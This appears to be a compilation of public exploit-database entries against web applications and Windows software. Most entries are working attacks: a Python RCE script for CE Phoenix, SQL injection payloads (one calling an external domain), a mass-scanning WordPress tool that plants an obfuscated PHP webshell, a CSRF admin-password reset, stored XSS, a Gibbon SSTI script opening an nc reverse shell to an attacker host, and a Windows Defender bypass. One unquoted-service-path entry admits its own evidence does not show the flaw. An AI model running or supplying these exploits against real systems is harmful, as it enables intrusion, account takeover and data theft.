## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated) #### Date: 2023-11-25 #### Exploit Author: tmrswrr #### Category: Webapps #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/) #### Version: v1.0.8.20 #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix) ## EXPLOIT : import requests from bs4 import BeautifulSoup import sys import urllib.parse import random from time import sleep class colors: OKBLUE = '\033[94m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' CBLACK = '\33[30m' CRED = '\33[31m' CGREEN = '\33[32m' CYELLOW = '\33[33m' CBLUE = '\33[34m' CVIOLET = '\33[35m' CBEIGE = '\33[36m' CWHITE = '\33[37m' def entry_banner(): color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE] random.shuffle(color_random) banner = color_random[0] + """ CE Phoenix v1.0.8.20 - Remote Code Execution \n Author: tmrswrr """ for char in banner: print(char, end='') sys.stdout.flush() sleep(0.0045) def get_formid_and_cookies(session, url): response = session.get(url, allow_redirects=True) if response.ok: soup = BeautifulSoup(response.text, 'html.parser') formid_input = soup.find('input', {'name': 'formid'}) if formid_input: return formid_input['value'], session.cookies return None, None def perform_exploit(session, url, username, password, command): print("\n[+] Attempting to exploit the target...") initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php" formid, cookies = get_formid_and_cookies(session, initial_url) if not formid: print("[-] Failed to retrieve initial formid.") return # Login print("[+] Performing login...") login_payload = { 'formid': formid, 'username': username, 'password': password } login_headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}', 'User-Agent': 
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': initial_url } login_url = url + "/admin/login.php?action=process" login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True) if not login_response.ok: print("[-] Login failed.") print(login_response.text) return print("[+] Login successful.") new_formid, _ = get_formid_and_cookies(session, login_response.url) if not new_formid: print("[-] Failed to retrieve new formid after login.") return # Exploit print("[+] Executing the exploit...") encoded_command = urllib.parse.quote_plus(command) exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B" exploit_headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': login_response.url } exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save" exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True) if exploit_response.ok: print("[+] Exploit executed successfully.") else: print("[-] Exploit failed.") print(exploit_response.text) final_response = session.get(url) print("\n[+] Executed Command Output:\n") print(final_response.text) def main(base_url, username, password, command): print("\n[+] Starting the exploitation process...") session = requests.Session() perform_exploit(session, base_url, username, password, command) if __name__ == "__main__": entry_banner() if len(sys.argv) < 5: print("Usage: python script.py [URL] [username] [password] [command]") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] command = sys.argv[4] main(base_url, username, password, command)
-
Smart School 6.4.1 - SQL Injection
# Exploit Title: Smart School 6.4.1 - SQL Injection # Exploit Author: CraCkEr # Date: 28/09/2023 # Vendor: QDocs - qdocs.net # Vendor Homepage: https://smart-school.in/ # Software Link: https://demo.smart-school.in/ # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-5495 # CWE: CWE-89 - CWE-74 - CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /course/filterRecords/ POST Parameter 'searchdata[0][title]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi] ------------------------------------------- POST /course/filterRecords/ HTTP/1.1 searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3 ------------------------------------------- searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi] Path: /course/filterRecords/ POST Parameter 'searchdata[0][title]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi POST Parameter 'searchdata[1][title]' is vulnerable to SQLi POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi --- Parameter: searchdata[0][title] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: 
searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[0][searchfield] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[0][searchvalue] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[1][title] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[1][searchvalue] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z --- ------------------------------------------- POST /course/filterRecords/ HTTP/1.1 searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi] ------------------------------------------- Path: /online_admission --- Parameter: MULTIPART email ((custom) POST) Type: time-based blind Title: MySQL >= 
5.0.12 time-based blind (query SLEEP) Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: 
application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385-- --- POST Parameter 'email' is vulnerable to SQLi POST /online_admission HTTP/1.1 -----------------------------320375734131102816923531485385 Content-Disposition: form-data; name="email" *[SQLi] -----------------------------320375734131102816923531485385 [-] Done
-
Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) # Date: 2024-02-25 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re , json from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} uploader = """ GIF89a <?php ?> <!DOCTYPE html> <html> <head> <title>Resultz</title> </head> <body><h1>Uploader</h1> <form enctype='multipart/form-data' action='' method='POST'> <p>Uploaded</p> <input type='file' name='uploaded_file'></input><br /> <input type='submit' value='Upload'></input> </form> </body> </html> <?PHP if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?> """ requests.urllib3.disable_warnings() def Exploit(Domain): try: if 'http' in Domain: Domain = Domain 
else: Domain = 'http://'+Domain myup = {'': ('db.php', uploader)} req = requests.post(Domain + '/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload', files=myup, headers=headers,verify=False, timeout=10).text req1 = requests.get(Domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php') if 'Ex3ptionaL' in req1: print (fg+'[+] '+ Domain + ' --> Shell Uploaded') open('Shellz.txt', 'a').write(Domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n') else: print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability') except: print(fr+' -| ' + Domain + ' --> {} [Failed]') target = open(input(fm+"Site List: "), "r").read().splitlines() mp = Pool(int(input(fm+"Threads: "))) mp.map(Exploit, target) mp.close() mp.join()
-
Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml, which has since been mitigated. More recently, on Feb 7, 2024, I disclosed that using multiple commas "," bypasses that mitigation; this has since been fixed as well. The fix was short-lived, as I found yet another trivial bypass (the third) soon after. [Exploit/POC] Open command prompt as Administrator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13) Access is denied. C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX') [Video PoC URL] https://www.youtube.com/watch?v=yn9gdJ7c7Kg [Network Access] Local [Severity] High [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt https://twitter.com/hyp3rlinx/status/1755417914599956833 https://twitter.com/hyp3rlinx/status/1758624140213264601 [Disclosure Timeline] Vendor Notification: February 16, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Casdoor < v1.331.0 - '/api/set-password' CSRF
# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF # Application: Casdoor # Version: <= 1.331.0 # Date: 03/07/2024 # Exploit Author: Van Lam Nguyen # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor # Tested on: Windows # CVE : CVE-2023-34927 Overview ================================================== Casdoor v1.331.0 and below contains a Cross-Site Request Forgery (CSRF) vulnerability in the endpoint /api/set-password. This vulnerability allows attackers to arbitrarily change the victim user's password by supplying a crafted URL. Proof of Concept ================================================== The following page submits a cross-site request to /api/set-password that bypasses the old-password verification step: <html> <form action="http://localhost:8000/api/set-password" method="POST"> <input name='userOwner' value='built-in' type='hidden'> <input name='userName' value='admin' type='hidden'> <input name='newPassword' value='hacked' type='hidden'> <input type=submit> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </html> If a user is logged into the Casdoor Webapp at the time of execution, a new user will be created in the app with the following credentials userOwner: built-in userName: admin newPassword: hacked
-
Axigen < 10.5.7 - Persistent Cross-Site Scripting
# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting # Date: 2023-09-25 # Exploit Author: Vinnie McRae - RedTeamer IT Security # Vendor Homepage: https://www.axigen.com/ # Software Link: https://www.axigen.com/mail-server/download/ # Version: (10.5.7) and older version of Axigen WebMail # Tested on: firefox, chrome # CVE: CVE-2023-48974 Description The `serverName_input` parameter is vulnerable to stored cross-site scripting (XSS) due to unsanitized or unfiltered processing. This means that an attacker can inject malicious code into this parameter, which will then be executed by other users when they view the page where the parameter is used. This is affecting authenticated administrators, and the attack can be used to attack other administrators with more permissions. Exploitation 1. Login as administrator 2. Navigate to "global settings" 3. Change server name to <script>alert(1)</script> PoC of the POST request: ``` POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1 Host: localhost:9443 Cookie: eula=true; WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D; webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true; public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52; menuLeftTopPosition=-754 Content-Type: multipart/form-data; boundary=---------------------------41639384187581032291088896642 Content-Length: 12401 Connection: close -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="serverName_input" <script>alert(1)</script> 
-----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="primary_domain_input" axigen -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="ssl_random_file_input" --SNIP-- -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="update" Save Configuration -----------------------------41639384187581032291088896642-- ``` #______________________________ #Vinnie McRae #RedTeamer IT Security #Blog: redteamer.de/blog-beitrag/
-
Gibbon LMS v26.0.00 - SSTI vulnerability
# Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability # Date: 21.01.2024 # Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24724 import requests import re import sys def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie']) if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']): print("login successful!") return Session_Cookie[4] def rce(cookie, target_host, target_port, attacker_ip, attacker_port): url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php' headers = {"Content-Type": "multipart/form-data; 
boundary=---------------------------67142646631840027692410521651", "Cookie": cookie} data = f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n/modules/School Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) if 'success0' in str(r.headers['Location']): print("Payload uploaded successfully!") def trigger(cookie, target_host, target_port): url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0' headers = {"Cookie": cookie} print("RCE successful!") r = requests.get(url, headers=headers, allow_redirects=False) if __name__ == '__main__': if len(sys.argv) != 7: print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>") sys.exit(1) cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6]) rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]) trigger(cookie, sys.argv[1], sys.argv[2])
-
ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2024-04-01 # Vendor : https://www.eset.com # Version : 17.0.16.0 # Tested on OS: Microsoft Windows 10 pro x64 C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET Security\ekrn.exe C:\>sc qc ekrn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ekrn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe" LOAD_ORDER_GROUP : Base TAG : 0 DISPLAY_NAME : ESET Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation
-
Computer Laboratory Management System v1.0 - Multiple-SQLi
# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi # Author: nu11secur1ty # Date: 03/28/2024 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 # Reference: https://portswigger.net/web-security/sql-injection # Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN (2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user/manage_user&id=7''' AND (SELECT 1734 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM (SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: page=user/manage_user&id=-2854' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL# ---
-
AnyDesk 7.0.15 - Unquoted Service Path
# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path # Date: 2024-04-01 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: http://anydesk.com # Software Link: http://anydesk.com/download # Version: Software Version 7.0.15 # Tested on: Windows 10 Pro x64 1. Description: AnyDesk installs as a service with an unquoted service path, running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. Note, however, that the BINARY_PATH_NAME in the `sc qc` output below is already enclosed in double quotes, so the output as shown does not by itself demonstrate an unquoted path; an unquoted service path is only exploitable when the quotes are absent and a lower-privileged user can write to one of the path's parent directories. 2. Proof C:\>sc qc anydesk [SC] QueryServiceConfig SUCCESS SERVICE_NAME: anydesk TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AnyDesk Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation